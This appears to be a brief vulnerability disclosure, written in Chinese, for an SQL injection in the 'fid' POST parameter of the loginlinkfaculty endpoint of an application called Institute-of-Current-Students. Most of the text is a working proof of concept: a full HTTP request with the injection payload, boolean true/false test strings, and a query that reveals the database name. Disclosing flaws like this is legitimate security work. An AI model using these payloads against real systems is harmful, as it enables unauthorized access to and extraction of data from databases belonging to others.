Institute-of-Current-Students 应用程序中的 loginlinkfaculty 端点通过 fid POST 参数存在 SQL 注入漏洞。该参数在用于 SQL 查询之前未经过适当的清理,从而允许远程攻击者执行任意 SQL 命令。
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov